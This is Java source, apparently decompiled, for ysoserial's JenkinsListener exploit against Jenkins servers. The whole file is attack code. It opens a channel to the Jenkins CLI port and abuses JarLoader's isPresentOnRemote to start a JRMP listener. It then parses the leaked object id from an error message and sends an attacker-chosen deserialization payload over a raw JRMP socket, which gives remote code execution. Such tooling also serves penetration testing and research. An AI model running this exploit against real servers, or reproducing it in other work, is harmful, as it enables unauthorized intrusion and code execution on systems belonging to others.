package ysoserial.exploit;

import hudson.remoting.Callable;
import hudson.remoting.Channel;
import hudson.remoting.JarLoader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.rmi.activation.ActivationDesc;
import java.rmi.activation.ActivationID;
import java.rmi.activation.ActivationInstantiator;
import javax.net.SocketFactory;
import net.sf.json.util.JSONUtils;
import sun.rmi.server.Util;
import ysoserial.exploit.JRMPClient;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.util.Reflections;

/* loaded from: input_file:ysoserial/exploit/JenkinsListener.class */
public class JenkinsListener {
    public static final void main(String[] strArr) {
        if (strArr.length < 3) {
            System.err.println(JenkinsListener.class.getName() + " <jenkins_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }
        Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(strArr[1]);
        if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
            System.err.println("Invalid payload type '" + strArr[1] + JSONUtils.SINGLE_QUOTE);
            System.exit(-1);
        }
        Channel channel = null;
        try {
            try {
                InetSocketAddress cliPort = JenkinsCLI.getCliPort(strArr[0]);
                channel = JenkinsCLI.openChannel(cliPort);
                int i = Reflections.getField(Class.forName("hudson.remoting.RemoteInvocationHandler"), "oid").getInt(Proxy.getInvocationHandler(channel.call(JenkinsCLI.getPropertyCallable(JarLoader.class.getName() + ".ours"))));
                System.err.println("* JarLoader oid is " + i);
                try {
                    channel.call((Callable) makeIsPresentOnRemoteCallable(i, new ysoserial.payloads.JRMPListener().getObject(String.valueOf(12345)), Class.forName("hudson.remoting.RemoteInvocationHandler$RPCRequest")));
                } catch (Exception e) {
                    System.err.println(e.getMessage());
                    parseObjIdAndExploit(strArr, payloadClass, 12345, cliPort, e);
                }
                if (channel != null) {
                    try {
                        channel.close();
                    } catch (IOException e2) {
                        e2.printStackTrace(System.err);
                    }
                }
            } catch (Throwable th) {
                th.printStackTrace();
                if (channel != null) {
                    try {
                        channel.close();
                    } catch (IOException e3) {
                        e3.printStackTrace(System.err);
                    }
                }
            }
        } catch (Throwable th2) {
            if (channel != null) {
                try {
                    channel.close();
                } catch (IOException e4) {
                    e4.printStackTrace(System.err);
                }
            }
            throw th2;
        }
    }

    private static Object makeIsPresentOnRemoteCallable(int i, Object obj, Class<?> cls) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, ClassNotFoundException {
        Constructor<?> declaredConstructor = cls.getDeclaredConstructor(Integer.TYPE, Method.class, Object[].class);
        declaredConstructor.setAccessible(true);
        return declaredConstructor.newInstance(Integer.valueOf(i), JarLoader.class.getMethod("isPresentOnRemote", Class.forName("hudson.remoting.Checksum")), new Object[]{obj});
    }

    private static void parseObjIdAndExploit(String[] strArr, Class<? extends ObjectPayload> cls, int i, InetSocketAddress inetSocketAddress, Exception exc) throws Exception, IOException {
        String message = exc.getMessage();
        int indexOf = message.indexOf("objID:[");
        if (indexOf < 0) {
            throw new Exception("Failed to get object id");
        }
        int indexOf2 = message.indexOf(", ", indexOf + 1);
        if (indexOf2 < 0) {
            throw new Exception("Failed to get object id, separator");
        }
        int indexOf3 = message.indexOf("]", indexOf2 + 1);
        if (indexOf3 < 0) {
            throw new Exception("Failed to get object id, separator");
        }
        String substring = message.substring(indexOf + 7, indexOf2);
        String substring2 = message.substring(indexOf2 + 2, indexOf3);
        System.err.println("* UID is " + substring);
        System.err.println("* ObjNum is " + substring2);
        String[] split = substring.split(":");
        exploit(new InetSocketAddress(inetSocketAddress.getAddress(), i), Long.parseLong(substring2), Integer.parseInt(split[0], 16), Long.parseLong(split[1], 16), Short.parseShort(split[2], 16), cls, strArr[2]);
    }

    private static void exploit(InetSocketAddress inetSocketAddress, long j, int i, long j2, short s, Class<?> cls, String str) throws IOException {
        Socket socket = null;
        DataOutputStream dataOutputStream = null;
        try {
            try {
                System.err.println("* Opening JRMP socket " + inetSocketAddress);
                socket = SocketFactory.getDefault().createSocket(inetSocketAddress.getAddress(), inetSocketAddress.getPort());
                socket.setKeepAlive(true);
                socket.setTcpNoDelay(true);
                OutputStream outputStream = socket.getOutputStream();
                dataOutputStream = new DataOutputStream(outputStream);
                dataOutputStream.writeInt(1246907721);
                dataOutputStream.writeShort(2);
                dataOutputStream.writeByte(76);
                dataOutputStream.write(80);
                JRMPClient.MarshalOutputStream marshalOutputStream = new JRMPClient.MarshalOutputStream(dataOutputStream);
                marshalOutputStream.writeLong(j);
                marshalOutputStream.writeInt(i);
                marshalOutputStream.writeLong(j2);
                marshalOutputStream.writeShort(s);
                marshalOutputStream.writeInt(-1);
                marshalOutputStream.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));
                ObjectPayload objectPayload = (ObjectPayload) cls.newInstance();
                Object object = objectPayload.getObject(str);
                marshalOutputStream.writeObject(object);
                outputStream.flush();
                ObjectPayload.Utils.releasePayload(objectPayload, object);
                if (dataOutputStream != null) {
                    dataOutputStream.close();
                }
                if (socket != null) {
                    socket.close();
                }
            } catch (Exception e) {
                e.printStackTrace(System.err);
                if (dataOutputStream != null) {
                    dataOutputStream.close();
                }
                if (socket != null) {
                    socket.close();
                }
            }
        } catch (Throwable th) {
            if (dataOutputStream != null) {
                dataOutputStream.close();
            }
            if (socket != null) {
                socket.close();
            }
            throw th;
        }
    }
}
